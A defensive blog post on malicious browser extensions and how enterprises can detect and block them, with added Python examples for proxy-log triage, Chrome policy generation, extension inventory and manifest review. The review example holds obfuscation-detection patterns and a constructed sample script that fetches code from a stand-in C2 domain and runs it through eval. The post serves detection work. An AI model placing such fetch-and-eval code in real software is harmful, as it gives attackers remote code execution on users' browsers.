In recent years browser extensions have become another unheralded avenue for attackers to steal passwords, exfiltrate data, identify users, and generate advertising revenue. They have been used by both nation-state and e-crime actors. The reason you should care is that there's almost no coverage from security tools and few enterprise controls. It's the malicious code in your enterprise that any user can download and that no one is looking for.
Chrome, Firefox, and Edge each have their own ecosystems for browser extensions and there's malware in all of them. But Chrome is arguably the most common ecosystem, and a number of Chromium-based browsers (Brave, Opera, Vivaldi) also support Chrome extensions. I've been shocked by the sheer number of malicious extensions that were identified and removed from the Chrome Web Store but are still running on end user systems. Google can update your Chrome extensions automatically, but for some reason isn't removing malicious extensions even when they've been removed from the Chrome Web Store.
A lot of research in this space already exists on the Internet and I'll link to it accordingly.
Typical Scenarios For Malicious Extensions
- The author of a legitimate extension gets a buyout offer and sells the extension. The buyer is actually an attacker who wants to quickly infect a million users. The attacker pushes a new update with malicious code, Chrome updates the extension automatically on end user systems, and a million users who had a legitimate extension are now running malware. See Better History and The Great Suspender for examples. We have also seen this happen through account takeovers, where the extension author is locked out of their account and an attacker adds a malicious update.
- A user is tricked into installing a malicious extension through phishing or malvertising. A Russian APT used this technique in 2015 and a North Korean APT did this in 2018, but there are plenty of e-crime campaigns using it for adware and monetization.
- A user downloads an extension that appears to be useful but is trojanized with malware/adware. Some legitimate extensions have evil doppelgangers with malware added.
The Dangers
What is the potential for damage? More than you might expect.
- Credential theft (See MEGA extension)
- Access/exfiltrate any data in the browser
- Injecting JavaScript or advertisements into any page (one campaign pushed a tech support scam)
- Injecting malware into websites you edit (See LNKR campaign)
- Hijack searches
- Track browsing behavior
- Change browser settings
- Take screenshots
- Read clipboard
How To Identify and Stop Malicious Extensions In Your Enterprise
Enterprise controls around browser extensions are severely lacking. Very few security tools even cover this space; Malwarebytes is one of the few that identifies malicious extensions on scans. What are our options?
Detection Via Domain Callbacks
Most malicious browser extensions need to reach out to the Internet to exfiltrate data, download the next stage of malicious code or to get the next advertisement. Detecting these domains in your DNS/proxy logs is a great way to detect malicious extensions in your environment.
Malicious browser extensions seem to come in campaigns and related malicious extensions tend to call out to the same domains/networks. It's the method I've been using to identify clusters/campaigns of extensions.
Where do we get these malicious domains? Again, open source intelligence is your friend. Reports on newly found malicious extensions often include these domains. Threat intelligence firms don't seem to specifically cover this space either. The proxy service I use does identify a lot of these domains as malicious but doesn't directly relate them to extensions. Another option is once you begin finding and analyzing malicious extensions there's often related domains in the code (sometimes they're heavily obfuscated, sometimes not) and you can begin adding your own research.
If you have EDR and an enterprise proxy, look for systems with repeated blocks to the same domain where the requesting process is Chrome. Sometimes it's just web browsing, but when a host is hitting the same blocked site regularly over days or weeks it's worth an investigation.
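To make the repeated-blocks hunt concrete, here is an added example (not from the original post and not the author's tooling) that runs the two checks described above over a constructed proxy/DNS export: it flags host/domain pairs that Chrome was blocked on across several distinct days, and separately matches every event, allowed or blocked, against a hand-maintained indicator list using suffix matching so subdomains of a known callback domain are caught. The log field layout, hostnames, domains and the KNOWN_BAD list are all assumptions made for the example; adapt the parser to whatever your proxy or EDR actually exports.

```python
import csv
from collections import defaultdict
from io import StringIO

# Constructed sample export: one proxy/DNS event per line. The column layout
# (timestamp,host,process,domain,action) is an assumption for this example.
SAMPLE_LOG = """\
timestamp,host,process,domain,action
2020-03-01T09:12:03Z,WS-0142,chrome.exe,stats.track-ext.example,BLOCK
2020-03-01T11:40:19Z,WS-0142,chrome.exe,stats.track-ext.example,BLOCK
2020-03-02T08:55:47Z,WS-0142,chrome.exe,stats.track-ext.example,BLOCK
2020-03-03T09:01:10Z,WS-0142,chrome.exe,stats.track-ext.example,BLOCK
2020-03-01T10:02:00Z,WS-0077,chrome.exe,ads.example.net,BLOCK
2020-03-01T10:02:05Z,WS-0077,chrome.exe,ads.example.net,BLOCK
2020-03-02T14:30:00Z,WS-0203,outlook.exe,stats.track-ext.example,BLOCK
2020-03-02T14:31:00Z,WS-0203,chrome.exe,cdn.legit-site.example,ALLOW
2020-03-04T16:20:00Z,WS-0310,chrome.exe,update.badext.example,ALLOW
"""

# Constructed indicator list: in practice these come from published reports
# or from domains you pulled out of an extension you already analyzed.
KNOWN_BAD = {"badext.example"}


def parse_log(text):
    return list(csv.DictReader(StringIO(text)))


def domain_matches(domain, iocs):
    """Suffix match so that c2.badext.example hits an IOC of badext.example,
    while badext.example.com (a different registrable domain) does not."""
    labels = domain.lower().split(".")
    return any(".".join(labels[i:]) in iocs for i in range(len(labels)))


def repeat_blocks(events, process="chrome.exe", min_days=3):
    """(host, domain) pairs the proxy blocked on at least min_days distinct
    days where the requesting process was the browser. A burst of blocks
    within one day is usually just browsing; the same domain day after day
    looks like something that runs on a timer."""
    days = defaultdict(set)
    for ev in events:
        if ev["action"] == "BLOCK" and ev["process"].lower() == process:
            days[(ev["host"], ev["domain"])].add(ev["timestamp"][:10])
    return {key: sorted(seen) for key, seen in days.items() if len(seen) >= min_days}


def ioc_hits(events, iocs):
    """Hosts that talked to a known callback domain, whether or not the
    proxy blocked it. An ALLOW here means your proxy's categorisation is
    behind your own research."""
    hits = defaultdict(set)
    for ev in events:
        if domain_matches(ev["domain"], iocs):
            hits[ev["host"]].add(ev["domain"])
    return {host: sorted(domains) for host, domains in hits.items()}


def triage(text, iocs=KNOWN_BAD):
    events = parse_log(text)
    return {"repeat_blocks": repeat_blocks(events), "ioc_hits": ioc_hits(events, iocs)}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for (host, domain), days in result["repeat_blocks"].items():
        print(f"INVESTIGATE {host}: {domain} blocked on {len(days)} days {days}")
    for host, domains in result["ioc_hits"].items():
        print(f"IOC HIT {host}: {domains}")
```

On the sample, WS-0142 surfaces from the repeat check (four blocks over three days), WS-0077 does not (two blocks in one day), the outlook.exe event on WS-0203 is ignored by the process filter, and WS-0310 surfaces only through the indicator list because the proxy allowed the request.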
Group Policy
Group Policy can be used for whitelisting or blacklisting extensions (the Chrome policies are ExtensionInstallAllowlist and ExtensionInstallBlocklist, spelled ExtensionInstallWhitelist and ExtensionInstallBlacklist in older builds).
Whitelisting: Blocking all extensions except for ones the company approves is the most secure way to handle this problem, but it will also cause the Help Desk a lot of grief as users start making complaints and requests to whitelist extensions. It's also possible to install copies of the browser that don't adhere to the group policy. Users love to get around security controls.
Blacklisting: Blocking known bad extensions is a low impact way to stop these attacks but leaves you open to the next malicious extension. I haven't found any threat intelligence firms that cover browser extensions but there's a vast amount of open source research available.
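The two policy shapes side by side, as an added example (not from the original post): a deny-by-default allowlist that blocks "*" and then permits approved ids, and a low-impact blocklist of known bad ids. The helper renders the same policy as the JSON Chrome reads from a managed policy file on Linux and as the numbered REG_SZ values Chrome reads from the policy key on Windows; the approved and blocked ids are placeholders. The id check matters because a mistyped id in a blocklist silently blocks nothing.

```python
import json
import re

# Chrome extension ids are 32 characters drawn from the letters a-p.
EXT_ID = re.compile(r"^[a-p]{32}$")


def is_valid_id(ext_id):
    return EXT_ID.match(ext_id) is not None


def check_ids(ids):
    bad = [i for i in ids if not is_valid_id(i)]
    if bad:
        raise ValueError(f"not Chrome extension ids: {bad}")
    return list(ids)


def allowlist_policy(approved):
    """Deny by default: block every extension, then allow only approved ids.
    Older Chrome builds spell these ExtensionInstallBlacklist/Whitelist."""
    return {
        "ExtensionInstallBlocklist": ["*"],
        "ExtensionInstallAllowlist": check_ids(approved),
    }


def blocklist_policy(known_bad):
    """Low impact: block only ids you already know are malicious."""
    return {"ExtensionInstallBlocklist": check_ids(known_bad)}


def linux_policy_json(policy):
    """Body of a file such as /etc/opt/chrome/policies/managed/extensions.json."""
    return json.dumps(policy, indent=2)


def registry_values(policy, root=r"HKLM\SOFTWARE\Policies\Google\Chrome"):
    """Chrome on Windows reads list policies as numbered REG_SZ values under a
    subkey named after the policy. Returns (key, value_name, data) triples.
    Pass root=r"HKLM\SOFTWARE\Policies\Microsoft\Edge" for Edge, which uses
    the same policy names."""
    return [
        (f"{root}\\{name}", str(n), ext_id)
        for name, ids in policy.items()
        for n, ext_id in enumerate(ids, start=1)
    ]


if __name__ == "__main__":
    approved = ["abcdefghijklmnopabcdefghijklmnop"]   # placeholder id, not a real extension
    print(linux_policy_json(allowlist_policy(approved)))
    for key, name, data in registry_values(allowlist_policy(approved)):
        print(key, name, data)
```

Whichever shape you pick, the policy only governs browsers that read that policy key; a browser build the user installed themselves that does not consult it is exactly the bypass the whitelisting paragraph warns about.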
Custom Tools
When I said enterprise controls around browser extensions were lacking, I wasn't kidding. I've had to build my own tools to List/Disable/Download extensions. I'll be releasing some of these on Github.
Removing Chrome extensions remotely is a tricky business. Chrome records which extensions are installed in the profile's Preferences and Secure Preferences files, not in the extension folder, so if you only delete the extension folder from the host and the extension still exists in the Chrome Web Store (Google isn't always receptive to these reports) Chrome will simply re-download it.
Challenges
Identifying Extensions
Unless you're in the browser's UI, extensions are not easily identifiable. Chrome extensions are identified by a 32 character id made up of the letters a through p (derived from a hash of the extension's signing key), which is also the name of the extension's folder on disk.
You probably don't have these memorized. But if the Chrome extension is in the Chrome Web Store, you can find out what extension it is by going to https://chrome.google.com/webstore/detail/<extension code>. The manifest.json always carries a name field, but it is frequently a localized placeholder such as __MSG_appName__ that Chrome resolves through _locales/<default_locale>/messages.json inside the extension folder, so the title is often not readable from the manifest alone. First thing I did was build a script to identify extensions using these methods.
If the title is not in the Chrome Web Store or manifest.json file, and it's not one of the default extensions installed with Chrome, identifying it can be tricky. Try Google or a service like Crxcavator.io or Crx4Chrome.
Microsoft Edge extensions appear to be similarly identifiable by going to Microsoft's add-ons site: https://microsoftedge.microsoft.com/addons/detail/<extension code>
For Firefox, identification isn't quite so easy. The extensions are zipped into .xpi files and I haven't been able to easily tie the extension code back to the Firefox Browser Add-Ons page.
Enterprise Wide Identification
It would be nice if there was a tool that allowed us to see all installed browser extensions across the environment. This doesn't currently exist in my experience. My current thought would be to run my ListChromeExtensions script across all hosts in the enterprise and dump the output to a database/logging platform on a regular basis. It wouldn't give an up-to-the-minute account of all installed extensions, but it would be an improvement over what currently exists.
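The enumeration and identification steps from the two sections above, written out as an added example (this is not the author's ListChromeExtensions script and is not from the original post). It assumes the standard Chrome on-disk layout of <profile>/Extensions/<id>/<version>/manifest.json under the user data directory, resolves localized __MSG_ names through _locales the way Chrome does, and builds the Web Store lookup URL for each id. The records it returns are what you would ship to your logging platform from every host; the sample profile it builds in a temp directory is constructed so the script runs offline.

```python
import json
import re
import tempfile
from pathlib import Path

# Chrome extension ids: 32 characters from the letters a-p.
EXT_ID = re.compile(r"^[a-p]{32}$")
STORE_URL = "https://chrome.google.com/webstore/detail/{}"

# Assumed user data roots (pass the right one for the host):
#   Windows  %LOCALAPPDATA%\Google\Chrome\User Data
#   Linux    ~/.config/google-chrome
#   macOS    ~/Library/Application Support/Google/Chrome
# Edge keeps the same layout under its own "User Data" directory.


def resolve_name(version_dir, manifest):
    """The manifest name is often a placeholder like __MSG_appName__; look it
    up in _locales/<default_locale>/messages.json as Chrome does, falling
    back to the raw value if the locale file or key is missing."""
    name = manifest.get("name", "")
    m = re.fullmatch(r"__MSG_(\w+)__", name)
    if not m:
        return name
    locale = manifest.get("default_locale", "en")
    messages = version_dir / "_locales" / locale / "messages.json"
    if messages.is_file():
        data = json.loads(messages.read_text(encoding="utf-8-sig"))
        return data.get(m.group(1), {}).get("message", name)
    return name


def list_extensions(user_data_dir):
    """One record per installed extension version across every profile.
    This is a filesystem view: it does not say whether Chrome currently has
    the extension enabled (that lives in the profile's Preferences files)."""
    rows = []
    for profile in sorted(Path(user_data_dir).iterdir()):
        ext_root = profile / "Extensions"
        if not ext_root.is_dir():
            continue
        for ext_dir in sorted(ext_root.iterdir()):
            if not EXT_ID.match(ext_dir.name):
                continue  # Temp/ and other non-extension directories
            for version_dir in sorted(ext_dir.iterdir()):
                manifest_path = version_dir / "manifest.json"
                if not manifest_path.is_file():
                    continue
                manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig"))
                rows.append({
                    "profile": profile.name,
                    "id": ext_dir.name,
                    "version": manifest.get("version", version_dir.name),
                    "name": resolve_name(version_dir, manifest),
                    "store_url": STORE_URL.format(ext_dir.name),
                    "permissions": manifest.get("permissions", []),
                })
    return rows


def build_fixture():
    """Constructed sample profile so the script runs offline: one extension
    with a localized name (exercising the _locales lookup) plus the Temp/
    directory Chrome leaves next to real extensions, which must be skipped."""
    root = Path(tempfile.mkdtemp())
    ext_id = "abcdefghijklmnopabcdefghijklmnop"   # placeholder, not a real extension
    version_dir = root / "Default" / "Extensions" / ext_id / "2.1.0_0"
    (version_dir / "_locales" / "en").mkdir(parents=True)
    (version_dir / "manifest.json").write_text(json.dumps({
        "manifest_version": 2, "name": "__MSG_appName__", "default_locale": "en",
        "version": "2.1.0", "permissions": ["tabs", "<all_urls>"],
    }))
    (version_dir / "_locales" / "en" / "messages.json").write_text(
        json.dumps({"appName": {"message": "Sample Tab Helper"}}))
    (root / "Default" / "Extensions" / "Temp").mkdir()
    return str(root)


if __name__ == "__main__":
    for row in list_extensions(build_fixture()):
        print(row["profile"], row["id"], row["version"], row["name"], row["store_url"])
```

Because the id is derived from the signing key, the same id on two hosts is the same extension, so the records from many hosts can be grouped by id and the store URL looked up once per id rather than once per host.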
How Do We Determine If An Extension Is Malicious?
This is the $25 million question. It's not a simple problem. Attackers insert their own functions into existing libraries (like jQuery) or add malicious code to otherwise legitimate JavaScript. More recently they're downloading code from a C2 server at runtime, so the malicious code is never even on the file system.
Analyze The Code
Put your javascript hat on. Analyzing the code in Chrome extensions is not a simple task nor is it a complete one. But it's the best way to find unknown malicious extensions.
In 2018 Google announced it would no longer allow extensions with obfuscated code, but obfuscated code is definitely still getting through.
Quick things to look for that increase suspicion:
- Sometimes the code includes the callback domains in plaintext.
- Look for code obfuscation in automatically run scripts (background and content scripts). If the code is hiding something, it's a red flag.
- Look for unnecessary permissions in the manifest.json.
- Look for 'unsafe-eval' in the content_security_policy in the manifest.json; it lets the extension execute code fetched at runtime.
Code analysis may be the only way to accurately determine if an extension is malicious but it's as slow as reversing malware. It's also useful if you can diff previous versions of the code to find the code changes (Previous versions are sometimes available at Crx4Chrome).
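The quick checks listed above, turned into a first-pass triage script as an added example (not from the original post, and no substitute for reading the code). It pulls the manifest's automatically run scripts (MV2 background scripts, MV3 service worker, content scripts) so you know which files to read first, flags risky and over-broad permissions in both the MV2 permissions list and the MV3 host_permissions list, checks the CSP for 'unsafe-eval' in both its string and MV3 dictionary forms, and scans script text for plaintext domains and common obfuscation or remote-loading tells. The permission descriptions, the regex heuristics, and the sample manifest and scripts are this example's own constructions.

```python
import re

# Permissions worth a second look when the extension's stated purpose does
# not need them. Descriptions are this example's own shorthand.
RISKY_PERMISSIONS = {
    "webRequest": "observe every request the browser makes",
    "webRequestBlocking": "modify or redirect requests",
    "tabs": "see the URL and title of every tab",
    "cookies": "read session cookies",
    "clipboardRead": "read the clipboard",
    "history": "read browsing history",
    "management": "disable other extensions, e.g. ad blockers",
    "nativeMessaging": "talk to a native host process",
    "proxy": "change proxy settings",
}
BROAD_HOST = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")

DOMAIN = re.compile(r"https?://([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.I)
OBFUSCATION = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bnew\s+Function\s*\("), "new Function()"),
    (re.compile(r"\batob\s*\("), "base64 decoded at runtime"),
    (re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}"), "long fromCharCode run"),
    (re.compile(r"(?:\\x[0-9a-f]{2}){16,}", re.I), "hex-escaped string"),
    (re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)"), "injects a <script> element"),
]


def auto_run_scripts(manifest):
    """Scripts Chrome runs without any user action: background scripts
    (MV2), the service worker (MV3) and content scripts. Read these first."""
    background = manifest.get("background", {})
    scripts = list(background.get("scripts", []))
    if background.get("service_worker"):
        scripts.append(background["service_worker"])
    for cs in manifest.get("content_scripts", []):
        scripts.extend(cs.get("js", []))
    return scripts


def csp_allows_eval(manifest):
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):                     # Manifest V3 form
        csp = csp.get("extension_pages", "")
    return "'unsafe-eval'" in csp


def triage_manifest(manifest):
    findings = []
    # MV3 moves host patterns into host_permissions; check both lists.
    for p in manifest.get("permissions", []) + manifest.get("host_permissions", []):
        if BROAD_HOST.match(p):
            findings.append(f"broad host access: {p}")
        elif p in RISKY_PERMISSIONS:
            findings.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    if csp_allows_eval(manifest):
        findings.append("CSP allows 'unsafe-eval'")
    return findings


def triage_script(filename, source):
    findings = []
    domains = sorted({m.group(1).lower() for m in DOMAIN.finditer(source)})
    if domains:
        findings.append(f"{filename}: plaintext domains {domains}")
    for pattern, label in OBFUSCATION:
        if pattern.search(source):
            findings.append(f"{filename}: {label}")
    longest = max((len(line) for line in source.splitlines()), default=0)
    if longest > 5000:
        findings.append(f"{filename}: {longest}-char line, packed or minified")
    return findings


def triage(manifest, scripts):
    """Manifest findings plus script findings for every auto-run script we
    have the source of (scripts is a {filename: source} mapping)."""
    findings = triage_manifest(manifest)
    for name in auto_run_scripts(manifest):
        if name in scripts:
            findings.extend(triage_script(name, scripts[name]))
    return findings


# Constructed sample, not taken from any real extension: a background script
# that fetches and evals remote code next to a harmless content script.
SAMPLE_MANIFEST = {
    "manifest_version": 2,
    "name": "Sample Tab Helper",
    "permissions": ["storage", "tabs", "webRequest", "webRequestBlocking", "<all_urls>"],
    "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
    "background": {"scripts": ["jquery.min.js", "bg.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
}
SAMPLE_SCRIPTS = {
    "bg.js": 'fetch("https://c2.badext.example/cfg").then(r => r.text()).then(t => eval(atob(t)));',
    "content.js": "document.title = document.title.trim();",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print(finding)
```

On the sample the manifest yields five findings (three risky permissions, broad host access and the eval-friendly CSP) and bg.js three more (the plaintext C2 domain, eval and atob), while content.js is clean. A real extension that fetches and evals code the way bg.js does leaves nothing on disk to diff, which is exactly why the runtime domain callbacks in the detection section matter as much as the static checks.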
Check Reviews
Often the reviews in the Chrome Web Store are indicative of bad behavior. If people are encountering pop ups or malware, they often post about it. But the bad guys are also posting fake reviews and Krebs wrote a recent article about it. This seems like a good avenue for future research. Find the fake reviews, find the malicious extensions.
Check the Extension On Crxcavator.io
Crxcavator scans extensions currently in the web store and reports risk levels. It's a useful tool for analysis but doesn't indicate whether an extension is actually malicious. Another tool in the toolbox.
Chrome Sync
Do you allow users in your environment to use Chrome sync? If so, they're copying all of their settings, including malicious Chrome extensions and malicious Chrome notifications, into your enterprise. Not to mention it's a data exfiltration path you probably haven't considered.
I haven't found a lot of research on Chrome Sync but I've definitely found malicious extensions synced and re-downloaded by a user after I removed them. I've also seen Chrome Sync trying to download Chrome extensions from malicious web sites (this was possible before 2015).
In Closing
Browser extensions are the wild west of malware at the moment. There's little visibility, almost no enterprise security tools to help, and they're as effective as a supply chain attack at reaching large audiences. Expect more attacks.
I anticipate the need to write more on this topic. I think it's worth sharing some of the tools I've developed to help identify extensions.
Other Interesting Reports
Awake Security: Malicious Domain Registrars
Duo Report on Malvertising Campaign